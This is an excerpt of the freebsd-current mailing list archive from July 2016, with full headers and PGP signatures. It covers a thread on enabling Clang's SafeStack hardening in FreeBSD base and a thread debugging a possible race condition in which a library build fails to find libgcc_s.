b=Ypc6ByZ0kok4Kji6xUaHMH7TRLjS2RXIAfKG8SOv2h4JFPRy7LdAZapVicfvJV1ph8 9QGGBI5xW00Ysiu0f7HDHv+wA9lyvPxeqYLVyuE4SDF5AdLiTXdtfK8oSBXfMKouqBus L8n3ofaTCaDVhS5bCeH2O3nhnLAdVAng8vE1kbwh6ZdcuOnCKqvBQ53Pf8G68IJvjhJi QG7TpiYuENfEbZSN24mWev/WEK/97YzxZoy25xfwkLLJZG06fHSgg5jSCVm+o3PMUezt l/62CxlAu+10U2s9DIoDVAnvJSQ+zrkkxiajsV3nNqbmFZ/fePDEIBHH5cmDSWXfFZ/M Ohcw== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:date:from:to:cc:subject:message-id:mime-version :content-disposition:user-agent; bh=H/tpH6bV/IojT8ZWqKZHUIwGA0u0tymwUZXC5T07oBY=; b=T9lcDq+e2gKQbVcSRyMDzhRQa9QTEUW5hihdwDipbIPndpQ492pVugU6XdUrr4/EAQ x6oOf7K9P9Iy9XHne72lRdREYzs3kZfxZ/UNCAmXOivkGjP7PLi8AX3SHH+AvbchdKA2 3ZKnvDMeW93+8rz1Q9CVEJWiYJoiu3w66AtLa9iw3xcdvT72YE2qMbOHXO5DkPFG+GY/ 7WfIzzAlUwozg7+BGCx6rBzHuT4Po4+mQyuxPxPjvQvHsB0DPsx+B/K2TQs5hbDRNRuL /MtiF4j+TvqURivgzJRDTV+HylkcjAYStqwOO20fuHGliuUTRHgzBY7/l7pIoxRCW7FH 82vg== X-Gm-Message-State: AEkoouti1iqGc7MSJDePcMYPqPLjJNKQbDTV5wI6cKInyjplhNDTBQ+0v/N3UuD9KaNFpzuWHUqBxFeQY1/CsOr/FnBZxsuHLocr3ho4LW4GSjTuaE8ggvJ3q6/TmjquBOCqHOIXzUNVmIzLQK6cFCQs9TcjYT4KJ3/HkPlAMH2xYUfUZT/dhJNAHoSSMSD49IfuJa3n X-Received: by 10.237.34.65 with SMTP id o1mr51225783qtc.78.1469660129768; Wed, 27 Jul 2016 15:55:29 -0700 (PDT) Received: from mutt-hardenedbsd (pool-100-16-217-171.bltmmd.fios.verizon.net. [100.16.217.171]) by smtp.gmail.com with ESMTPSA id j7sm5584620qkf.11.2016.07.27.15.55.28 (version=TLS1_2 cipher=ECDHE-RSA-CHACHA20-POLY1305 bits=256/256); Wed, 27 Jul 2016 15:55:28 -0700 (PDT) Date: Wed, 27 Jul 2016 18:55:27 -0400 From: Shawn Webb To: freebsd-current@freebsd.org Cc: emaste@freebsd.org Subject: SafeStack in base Message-ID: <20160727225527.GG13428@mutt-hardenedbsd> MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha256; protocol="application/pgp-signature"; boundary="GBDnBH7+ZvLx8QD4" Content-Disposition: inline X-Operating-System: FreeBSD mutt-hardenedbsd 12.0-CURRENT-HBSD FreeBSD 12.0-CURRENT-HBSD X-PGP-Key: http://pgp.mit.edu/pks/lookup?op=vindex&search=0x6A84658F52456EEE User-Agent: Mutt/1.6.1 (2016-04-27) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 27 Jul 2016 22:55:31 -0000 --GBDnBH7+ZvLx8QD4 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Hey All, I'm interested in getting SafeStack working in FreeBSD base. Below is a link to a simplistic (maybe too simplistic?) patch to enable SafeStack. The patch applies against HardenedBSD's hardened/current/master branch. Given how simple the patch is, it'd be extremely easy to port over to FreeBSD (just line numbers would change). I am running into a bit of a problem, though. When linking lib/libcom_err, I get the following error: com_err.So: In function `com_err': /usr/src/lib/libcom_err/../../contrib/com_err/com_err.c:100: undefined refe= rence to `__safestack_unsafe_stack_ptr' cc: error: linker command failed with exit code 1 (use -v to see invocation) *** [libcom_err.so.5.full] Error code 1 llvm's documentation says that SafeStack has been tested on FreeBSD. When and how was it tested? Apparently someone has done some work to enable it on FreeBSD, but I can't find any relevant FreeBSD-specific documentation. If someone could point me in the right direction, I'd love to help get SafeStack working (and commited?) in FreeBSD. Link to simplistic patch: http://ix.io/186A Link to build log: https://gist.github.com/lattera/5d94f44a5f3e10a28425cd59= 104dd169 Thanks, --=20 Shawn Webb Cofounder and Security Engineer HardenedBSD GPG Key ID: 0x6A84658F52456EEE GPG Key Fingerprint: 2ABA B6BD EF6A F486 BE89 3D9E 6A84 658F 5245 6EEE --GBDnBH7+ZvLx8QD4 Content-Type: application/pgp-signature; name="signature.asc" -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQIcBAEBCAAGBQJXmTveAAoJEGqEZY9SRW7uC9sQALS+PI7Wobe9LE35GarzqSt1 lYxTNeIR+UMi9Nb8db+HKMoHDXZPqmxAiyJgdOoUyP/EcyWzJQxzZ2JdSRlVZ+lR QX/+tPscF0Y+rMnu+vCuX5oJ3LGhwytfgQWDfW3NAbcVdQzSXkpCZG9fobOIXsOb ISW2x9/zTnnoMJuY7yyZHPhwjzC+ePwbJCYt0lPHYeQLN4d/g4g/mc1pPH6CHS/v EaqwItbor75DZaeUwk7xRJzcU/WuyPPxhlugtknhawqz1N2pDH6FTWX4pIpXeY+N vcyGQMDtXIeJiZxobOQolcYalOZqNyenDpRhfOGZ7RU0icq/9FEVd/AJW7OpPxNv Qw0D6h9VEwpEtvomwnE3eGmRebHcmXu3VPnUlDEaMvvJJO5MgtGhpYEXv0wg+TNr FLDoboUZqTMcr8LlX5F3hh7g/Ktvw3z9C7hVBnzIczwS1EoRaLhPw/Zie0X/JGEW HBQiGoCryILX2/XyUd4Tt4rR0trtEBIwyV/m+hTjQc4PWFHBOR4ItET7Aqlc7KC1 nND0jixU3jBuvZavpDpgYkupwALd8GyoGflj4CJdlQ2oW6TXohbsChvWX0QW3e5v U5L5sgx5yDFlTB/y/Pn8xPeBmb92eO+8f7mzUvKY494hEZ4YgIHzZc273KH0kyH1 9SiwJ6Wfg1uxnczbQFbI =PZla -----END PGP SIGNATURE----- --GBDnBH7+ZvLx8QD4-- From owner-freebsd-current@freebsd.org Wed Jul 27 23:34:44 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 3A483BA6E91 for ; Wed, 27 Jul 2016 23:34:44 +0000 (UTC) (envelope-from bdrewery@FreeBSD.org) Received: from mailman.ysv.freebsd.org (mailman.ysv.freebsd.org [IPv6:2001:1900:2254:206a::50:5]) by mx1.freebsd.org (Postfix) with ESMTP id 1CF5217C1 for ; Wed, 27 Jul 2016 23:34:44 +0000 (UTC) (envelope-from bdrewery@FreeBSD.org) Received: by mailman.ysv.freebsd.org (Postfix) id 18EB6BA6E90; Wed, 27 Jul 2016 23:34:44 +0000 (UTC) Delivered-To: current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 163EBBA6E8F for ; Wed, 27 Jul 2016 23:34:44 +0000 (UTC) (envelope-from bdrewery@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:1900:2254:206c::16:87]) by mx1.freebsd.org (Postfix) with ESMTP id E0B3217C0; Wed, 27 Jul 2016 23:34:43 +0000 (UTC) (envelope-from bdrewery@FreeBSD.org) Received: from mail.xzibition.com (localhost [IPv6:::1]) by freefall.freebsd.org (Postfix) with ESMTP id D70491384; Wed, 27 Jul 2016 23:34:43 +0000 (UTC) (envelope-from bdrewery@FreeBSD.org) Received: from mail.xzibition.com (localhost [172.31.3.2]) by mail.xzibition.com (Postfix) with ESMTP id 96B1F23F30; Wed, 27 Jul 2016 23:34:43 +0000 (UTC) X-Virus-Scanned: amavisd-new at mail.xzibition.com Received: from mail.xzibition.com ([172.31.3.2]) by mail.xzibition.com (mail.xzibition.com [172.31.3.2]) (amavisd-new, port 10026) with LMTP id BHhUEIl-MFSN; Wed, 27 Jul 2016 23:34:40 +0000 (UTC) Subject: Re: Possible race condition building libraries: head/amd64 r303329 -> r303379 DKIM-Filter: OpenDKIM Filter v2.9.2 mail.xzibition.com B735523F2B To: David Wolfskill , current@freebsd.org References: <20160727124956.GV1294@albert.catwhisker.org> From: Bryan Drewery Openpgp: id=F9173CB2C3AAEA7A5C8A1F0935D771BB6E4697CF; url=http://www.shatow.net/bryan/bryan2.asc Organization: FreeBSD Message-ID: <688dac73-e9d6-68e9-8119-2a8720dcdad0@FreeBSD.org> Date: Wed, 27 Jul 2016 16:34:39 -0700 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Thunderbird/45.2.0 MIME-Version: 1.0 In-Reply-To: <20160727124956.GV1294@albert.catwhisker.org> Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="CptbKLHBU98WoiCD8EWjH1mI4EucQkrC3" X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 27 Jul 2016 23:34:44 -0000 This is an OpenPGP/MIME signed message (RFC 4880 and 3156) --CptbKLHBU98WoiCD8EWjH1mI4EucQkrC3 Content-Type: multipart/mixed; boundary="sWDq1OAapxWPIskL4Fg61771mpbdoh5Cr" From: Bryan Drewery To: David Wolfskill , current@freebsd.org Message-ID: <688dac73-e9d6-68e9-8119-2a8720dcdad0@FreeBSD.org> Subject: Re: Possible race condition building libraries: head/amd64 r303329 -> r303379 References: <20160727124956.GV1294@albert.catwhisker.org> In-Reply-To: <20160727124956.GV1294@albert.catwhisker.org> --sWDq1OAapxWPIskL4Fg61771mpbdoh5Cr Content-Type: text/plain; charset=windows-1252 Content-Transfer-Encoding: quoted-printable On 7/27/2016 5:49 AM, David Wolfskill wrote: > I track head daily on both my laptop and a "build machine;" I only saw = a > problem on the latter -- not on my laptop. >=20 > (The build machine is a bit beefier, and uses an SSD as its non-volatil= e > storage; the laptop uses a hybrid disk -- in case that is useful.) >=20 > As indicated in the Subject, in each case I was performing a > source-based upgrade-in-place from r303329 to r303379. (And I've > been doing this routinely for quite some time.) >=20 > The build failed (initially -- a restart worked): >=20 > ... >>>> stage 4.2: building libraries > ... > --- secure/lib/libcrypto__L --- > Building /common/S4/obj/usr/src/secure/lib/libcrypto/dso_openssl.o > --- lib/ncurses/ncursesw__L --- > /usr/lib/libtermlibw.so -> libncursesw.so > /usr/lib/libtinfow.so -> libncursesw.so > --- kerberos5/lib/libwind__L --- > Building /common/S4/obj/usr/src/kerberos5/lib/libwind/normalize_table.S= o > --- kerberos5/lib/libheimipcc__L --- > /usr/obj/usr/src/tmp/usr/bin/ld: cannot find -lgcc_s > cc: error: linker command failed with exit code 1 (use -v to see invoca= tion) > *** [libprivateheimipcc.so.11] Error code 1 Nathan Whitehorn ran into a very similar one last year that I couldn't explain either. > --- kerberos5/lib__L --- > --- libkadm5srv.so.11 --- > /usr/obj/usr/src/tmp/usr/bin/ld: cannot find -lgcc > *** [libkadm5srv.so.11] Error code 1 >=20 > make[5]: stopped in /usr/src/kerberos5/lib/libkadm5srv=20 These shouldn't happen since libgcc is build in startup_libs and krb5 is built in prebuild_libs, which waits on startup_libs. Very strange. Can you send me the typescript please? --=20 Regards, Bryan Drewery --sWDq1OAapxWPIskL4Fg61771mpbdoh5Cr-- --CptbKLHBU98WoiCD8EWjH1mI4EucQkrC3 Content-Type: application/pgp-signature; name="signature.asc" Content-Description: OpenPGP digital signature Content-Disposition: attachment; filename="signature.asc" -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBAgAGBQJXmUUPAAoJEDXXcbtuRpfPNzYIAK/WS9yv8EEL8K6I4LWIJvue 2rIMJ/WYBE77dqTIEeIHjDcBGKbjFiT6iygxMcRxY7ThMdoN8gWFvpkAI+vGDFXG c3OeYgUmyo0+niIDs60VOEWxKwIk5Ub6UjY/u1JHO6hTu3aekBB3b4eF/Yv/+ZhL XP3+O4EjzMkyLzWKgvLDF/YjaDCJiCGhsdTTIrw/nAIWu+npO/XzW7Oo+D782Qei 3MP4+AAp1K0iatQB9XHW4y7CLIe4n5Z/sPCuhzmegNR+gnt397bZe3641Kgfuf3B 4YajVvjGi9Idc7yb0yq5o4HXI/t+S83PGc2BYKUhTxL0OHiO24d6Wh4rvLIGCKc= =jUqS -----END PGP SIGNATURE----- --CptbKLHBU98WoiCD8EWjH1mI4EucQkrC3-- From owner-freebsd-current@freebsd.org Wed Jul 27 23:55:20 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 61518BA7334 for ; Wed, 27 Jul 2016 23:55:20 +0000 (UTC) (envelope-from david@catwhisker.org) Received: from mailman.ysv.freebsd.org (mailman.ysv.freebsd.org [IPv6:2001:1900:2254:206a::50:5]) by mx1.freebsd.org (Postfix) with ESMTP id 4A9FB1FE3 for ; Wed, 27 Jul 2016 23:55:20 +0000 (UTC) (envelope-from david@catwhisker.org) Received: by mailman.ysv.freebsd.org (Postfix) id 49D08BA7333; Wed, 27 Jul 2016 23:55:20 +0000 (UTC) Delivered-To: current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 49781BA7332 for ; Wed, 27 Jul 2016 23:55:20 +0000 (UTC) (envelope-from david@catwhisker.org) Received: from albert.catwhisker.org (mx.catwhisker.org [198.144.209.73]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 18FCA1FDC; Wed, 27 Jul 2016 23:55:19 +0000 (UTC) (envelope-from david@catwhisker.org) Received: from albert.catwhisker.org (localhost [127.0.0.1]) by albert.catwhisker.org (8.15.2/8.15.2) with ESMTP id u6RNtINN045096; Wed, 27 Jul 2016 23:55:18 GMT (envelope-from david@albert.catwhisker.org) Received: (from david@localhost) by albert.catwhisker.org (8.15.2/8.15.2/Submit) id u6RNtIAE045095; Wed, 27 Jul 2016 16:55:18 -0700 (PDT) (envelope-from david) Date: Wed, 27 Jul 2016 16:55:18 -0700 From: David Wolfskill To: Bryan Drewery Cc: current@freebsd.org Subject: Re: Possible race condition building libraries: head/amd64 r303329 -> r303379 Message-ID: <20160727235518.GY1294@albert.catwhisker.org> Mail-Followup-To: David Wolfskill , Bryan Drewery , current@freebsd.org References: <20160727124956.GV1294@albert.catwhisker.org> <688dac73-e9d6-68e9-8119-2a8720dcdad0@FreeBSD.org> MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha512; protocol="application/pgp-signature"; boundary="/OCBIV6O7sl/38gM" Content-Disposition: inline In-Reply-To: <688dac73-e9d6-68e9-8119-2a8720dcdad0@FreeBSD.org> User-Agent: Mutt/1.6.1 (2016-04-27) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 27 Jul 2016 23:55:20 -0000 --/OCBIV6O7sl/38gM Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Jul 27, 2016 at 04:34:39PM -0700, Bryan Drewery wrote: > ... > These shouldn't happen since libgcc is build in startup_libs and krb5 is > built in prebuild_libs, which waits on startup_libs. Very strange. >=20 > Can you send me the typescript please? > .... (For folks playing along at home, I sent Bryan the typescript. I've also placed a copy at http://www.catwhisker.org/~david/FreeBSD/head/typescript_r303379.gz.) Peace, david --=20 David H. Wolfskill david@catwhisker.org Those who would murder in the name of God or prophet are blasphemous coward= s. See http://www.catwhisker.org/~david/publickey.gpg for my public key. --/OCBIV6O7sl/38gM Content-Type: application/pgp-signature; name="signature.asc" -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQF8BAEBCgBmBQJXmUnmXxSAAAAAAC4AKGlzc3Vlci1mcHJAbm90YXRpb25zLm9w ZW5wZ3AuZmlmdGhob3JzZW1hbi5uZXRDQ0I3Q0VGOTE3QTgwMUY0MzA2NEQ3N0Ix NTM5Q0M0MEEwNDlFRTE3AAoJEBU5zECgSe4XS6IH/22jcoa7fjQUN7km7s3hN4i8 TDscj+8QU7A0vgkTi/WMp8Ov52ZJj20QQGn7oy20zIQzJiMoGPmhxtQASLtW7RoN wrw8p7JNEa5JimwaWa0MRxWNqGBoGA+DWLcxyjXaXmQSQ9rUaY9Aw+6iZZ+6GVZy mZL+H1jRrzgg5Z6LSXK34HIS8qX511Vx39TEjnJ6F0p0gcMMgLUmaHf4wDbv4x0V PTFltfLsBM1+ZEJRt5ZRaj9zB4RHgtkzGOj00FJJqVTpmWZsuNge1P9DDVkGUDxK 3QLAX3aq+8USsafvjCdeaEfRuFvoIa0wrvJwWItyGkDJiYoqzUWt3UXy3dc5ZWE= =IT6L -----END PGP SIGNATURE----- --/OCBIV6O7sl/38gM-- From owner-freebsd-current@freebsd.org Thu Jul 28 00:02:17 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 41A1CBA768F for ; Thu, 28 Jul 2016 00:02:17 +0000 (UTC) (envelope-from cse.cem@gmail.com) Received: from mail-io0-f174.google.com (mail-io0-f174.google.com [209.85.223.174]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 15E1F150F; Thu, 28 Jul 2016 00:02:16 +0000 (UTC) (envelope-from cse.cem@gmail.com) Received: by mail-io0-f174.google.com with SMTP id q83so85623204iod.1; Wed, 27 Jul 2016 17:02:16 -0700 (PDT) X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:mime-version:reply-to:in-reply-to:references :from:date:message-id:subject:to:cc:content-transfer-encoding; bh=zRJZZ24mkxwqKb9zY+S50I4rnCSUiq831kPx2ZBceJA=; b=CGKsmDNbHCD0h/8y++d3nxfYzKCeAlgn58FS2njF+elXtEv0fd5ydkFMp0jitgYYQx QNAWuEj1itG+WyXtOrph4YANhpkGAMYDS3xK6xjU4vuu6WeqtlC2qhG432ifGCgn2QLe /5G4X47QUTwNBYUQeMsy5VRsfEOmmgeTo4d4KQxGFfn7LaGLAA9JLbSGfL/31cQf4eFo 0+1rJlWSl3ZtqSgX1cVewAoyeqxFqL5K1NnG5TZPKODThTLbFTuC6Z4LgFGbPFgyVIRg +1IIX4QcHF1wU4G5IlIggZsN/P43PT987+zXUpPpMpUSjJi10q596NZvIA09R61CdQQU HP8g== X-Gm-Message-State: AEkoouuVmU4E+3Tqbhcl0VyY9ebWLhbVYxhQEgpVJi8lOAz3LhwiU57NOVgD4skV+8qqTQ== X-Received: by 10.107.37.198 with SMTP id l189mr30914747iol.117.1469664135289; Wed, 27 Jul 2016 17:02:15 -0700 (PDT) Received: from mail-it0-f47.google.com (mail-it0-f47.google.com. [209.85.214.47]) by smtp.gmail.com with ESMTPSA id 4sm3862675itw.4.2016.07.27.17.02.12 (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); Wed, 27 Jul 2016 17:02:15 -0700 (PDT) Received: by mail-it0-f47.google.com with SMTP id j124so65353742ith.1; Wed, 27 Jul 2016 17:02:12 -0700 (PDT) X-Received: by 10.36.29.15 with SMTP id 15mr9930216itj.97.1469664132646; Wed, 27 Jul 2016 17:02:12 -0700 (PDT) MIME-Version: 1.0 Reply-To: cem@freebsd.org Received: by 10.36.233.67 with HTTP; Wed, 27 Jul 2016 17:02:07 -0700 (PDT) In-Reply-To: <20160727225527.GG13428@mutt-hardenedbsd> References: <20160727225527.GG13428@mutt-hardenedbsd> From: Conrad Meyer Date: Wed, 27 Jul 2016 17:02:07 -0700 X-Gmail-Original-Message-ID: Message-ID: Subject: Re: SafeStack in base To: Shawn Webb Cc: freebsd-current , Ed Maste Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 00:02:17 -0000 On Wed, Jul 27, 2016 at 3:55 PM, Shawn Webb wr= ote: > Hey All, > > I'm interested in getting SafeStack working in FreeBSD base. Below is a > link to a simplistic (maybe too simplistic?) patch to enable SafeStack. > The patch applies against HardenedBSD's hardened/current/master branch. > Given how simple the patch is, it'd be extremely easy to port over to > FreeBSD (just line numbers would change). > > I am running into a bit of a problem, though. When linking > lib/libcom_err, I get the following error: > > com_err.So: In function `com_err': > /usr/src/lib/libcom_err/../../contrib/com_err/com_err.c:100: undefined re= ference to `__safestack_unsafe_stack_ptr' > cc: error: linker command failed with exit code 1 (use -v to see invocati= on) > *** [libcom_err.so.5.full] Error code 1 > > llvm's documentation says that SafeStack has been tested on FreeBSD. > When and how was it tested? Apparently someone has done some work to > enable it on FreeBSD, but I can't find any relevant FreeBSD-specific > documentation. > > If someone could point me in the right direction, I'd love to help get > SafeStack working (and commited?) in FreeBSD. > > Link to simplistic patch: http://ix.io/186A > Link to build log: https://gist.github.com/lattera/5d94f44a5f3e10a28425cd= 59104dd169 Hey Shawn, The relevant link line is: > -- libcom_err.so.5.full --- > building shared library libcom_err.so.5 > cc -target x86_64-unknown-freebsd12.0 --sysroot=3D/usr/obj/usr/src/tmp -B= /usr/obj/usr/src/tmp/usr/bin -Wl,--no-undefined -Wl,-z,relro -Wl,-z,now -fs= anitize=3Dsafe-stack -Wl,--version-script=3D/usr/src/lib/libcom_err/../../c= ontrib/com_err/version-script.map -fstack-protector-strong -shared -Wl,-x -= Wl,--fatal-warnings -Wl,--warn-shared-textrel -o libcom_err.so.5.full -Wl,= -soname,libcom_err.so.5 `NM=3D'nm' NMFLAGS=3D'' lorder com_err.So error.So= | tsort -q` The problem appears to be an upstream limitation of -fsanitize=3Dsafe-stack: "Most programs, static libraries, or individual files can be compiled with SafeStack as is. =E2=80=A6 Linking a DSO with SafeStack is not currently supported." [0] That probably needs to be addressed upstream before it can be enabled globa= lly. Best, Conrad [0]: http://clang.llvm.org/docs/SafeStack.html From owner-freebsd-current@freebsd.org Thu Jul 28 00:03:27 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 0F332BA7715 for ; Thu, 28 Jul 2016 00:03:27 +0000 (UTC) (envelope-from bdrewery@FreeBSD.org) Received: from mailman.ysv.freebsd.org (unknown [127.0.1.3]) by mx1.freebsd.org (Postfix) with ESMTP id E47A916A3 for ; Thu, 28 Jul 2016 00:03:26 +0000 (UTC) (envelope-from bdrewery@FreeBSD.org) Received: by mailman.ysv.freebsd.org (Postfix) id E39B3BA7714; Thu, 28 Jul 2016 00:03:26 +0000 (UTC) Delivered-To: current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id E3459BA7713 for ; Thu, 28 Jul 2016 00:03:26 +0000 (UTC) (envelope-from bdrewery@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:1900:2254:206c::16:87]) by mx1.freebsd.org (Postfix) with ESMTP id C6C3216A2; Thu, 28 Jul 2016 00:03:26 +0000 (UTC) (envelope-from bdrewery@FreeBSD.org) Received: from mail.xzibition.com (localhost [IPv6:::1]) by freefall.freebsd.org (Postfix) with ESMTP id BFB6017C8; Thu, 28 Jul 2016 00:03:26 +0000 (UTC) (envelope-from bdrewery@FreeBSD.org) Received: from mail.xzibition.com (localhost [172.31.3.2]) by mail.xzibition.com (Postfix) with ESMTP id 6C34723FA2; Thu, 28 Jul 2016 00:03:26 +0000 (UTC) X-Virus-Scanned: amavisd-new at mail.xzibition.com Received: from mail.xzibition.com ([172.31.3.2]) by mail.xzibition.com (mail.xzibition.com [172.31.3.2]) (amavisd-new, port 10026) with LMTP id XS3QjashSzXk; Thu, 28 Jul 2016 00:03:23 +0000 (UTC) Subject: Re: Possible race condition building libraries: head/amd64 r303329 -> r303379 DKIM-Filter: OpenDKIM Filter v2.9.2 mail.xzibition.com 9AFF523F9D To: David Wolfskill , current@freebsd.org References: <20160727124956.GV1294@albert.catwhisker.org> <688dac73-e9d6-68e9-8119-2a8720dcdad0@FreeBSD.org> <20160727235518.GY1294@albert.catwhisker.org> From: Bryan Drewery Openpgp: id=F9173CB2C3AAEA7A5C8A1F0935D771BB6E4697CF; url=http://www.shatow.net/bryan/bryan2.asc Organization: FreeBSD Message-ID: <4e7cf16d-7070-de4c-fc65-d1676d093f0b@FreeBSD.org> Date: Wed, 27 Jul 2016 17:03:25 -0700 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Thunderbird/45.2.0 MIME-Version: 1.0 In-Reply-To: <20160727235518.GY1294@albert.catwhisker.org> Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="iJMOKXKfghHcgSaUwb0EQA4ssgLQoekLM" X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 28 Jul 2016 00:03:27 -0000 This is an OpenPGP/MIME signed message (RFC 4880 and 3156) --iJMOKXKfghHcgSaUwb0EQA4ssgLQoekLM Content-Type: multipart/mixed; boundary="XW7rNRl6J9PlIPWNfFQo41aLf4MmoOkIc" From: Bryan Drewery To: David Wolfskill , current@freebsd.org Message-ID: <4e7cf16d-7070-de4c-fc65-d1676d093f0b@FreeBSD.org> Subject: Re: Possible race condition building libraries: head/amd64 r303329 -> r303379 References: <20160727124956.GV1294@albert.catwhisker.org> <688dac73-e9d6-68e9-8119-2a8720dcdad0@FreeBSD.org> <20160727235518.GY1294@albert.catwhisker.org> In-Reply-To: <20160727235518.GY1294@albert.catwhisker.org> --XW7rNRl6J9PlIPWNfFQo41aLf4MmoOkIc Content-Type: text/plain; charset=windows-1252 Content-Transfer-Encoding: quoted-printable On 7/27/2016 4:55 PM, David Wolfskill wrote: > On Wed, Jul 27, 2016 at 04:34:39PM -0700, Bryan Drewery wrote: >> ... >> These shouldn't happen since libgcc is build in startup_libs and krb5 = is >> built in prebuild_libs, which waits on startup_libs. Very strange. >> >> Can you send me the typescript please? >> .... >=20 > (For folks playing along at home, I sent Bryan the typescript. I've als= o > placed a copy at > http://www.catwhisker.org/~david/FreeBSD/head/typescript_r303379.gz.) >=20 Yeah, very strange. > 20609 Building /common/S4/obj/usr/src/gnu/lib/libgcc/libgcc_s.so.1^M =20 > 20610 --- libgcc_s.so.1 ---^M =20 > 20611 building shared library libgcc_s.so.1^M =20 > 20612 Building /common/S4/obj/usr/src/gnu/lib/libgcc/_lib-eh-install^M > 20613 Building /common/S4/obj/usr/src/gnu/lib/libgcc/_libinstall^M =20 It built libgcc_s, installed it to WORLDTMP... > 25131 Building /common/S4/obj/usr/src/kerberos5/lib/libwind/normalize_t= able.So^M > 25132 --- kerberos5/lib/libheimipcc__L ---^M > 25133 /usr/obj/usr/src/tmp/usr/bin/ld: cannot find -lgcc_s^M > 25134 cc: error: linker command failed with exit code 1 (use -v to see = invocation)^M > 25135 *** [libprivateheimipcc.so.11] Error code 1^M > 25136 ^M > 25137 bmake[4]: stopped in /usr/src/kerberos5/lib/libheimipcc^M Then failed to find it. --=20 Regards, Bryan Drewery --XW7rNRl6J9PlIPWNfFQo41aLf4MmoOkIc-- --iJMOKXKfghHcgSaUwb0EQA4ssgLQoekLM Content-Type: application/pgp-signature; name="signature.asc" Content-Description: OpenPGP digital signature Content-Disposition: attachment; filename="signature.asc" -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBAgAGBQJXmUvNAAoJEDXXcbtuRpfPD8MIAKDb3nZvOgj0KJHi1RWvQFht NZ36L/crO6LJF4aIv3eKo2hniVTqP3KiU1PmPfpHTxij/EWNEEmUSPLO57Grpv8W nZx1vsTBRBQzMsQV3yFlFk2Hg2WvQgbpHjfYr4HZ5S98xg3cOkWAhSSFse9hpzt0 psBLofg4GVYyFLkOkkXh8v2HNHXFaZFNDgRu//uxmYD8mmzKuEibsz4/AeOrwR7U ijsbKi6xY1oQy+MWYqF8obp49WPcaJLj94TFJAmEwU4dwr1zmxGB4rjUe1UJjdVw 0V+hr3KbXAuTasrMzm2d/on3OUkUhArl8c0s8gOdE5lXg9K24njQESKhXc5d8eI= =PSXz -----END PGP SIGNATURE----- --iJMOKXKfghHcgSaUwb0EQA4ssgLQoekLM-- From 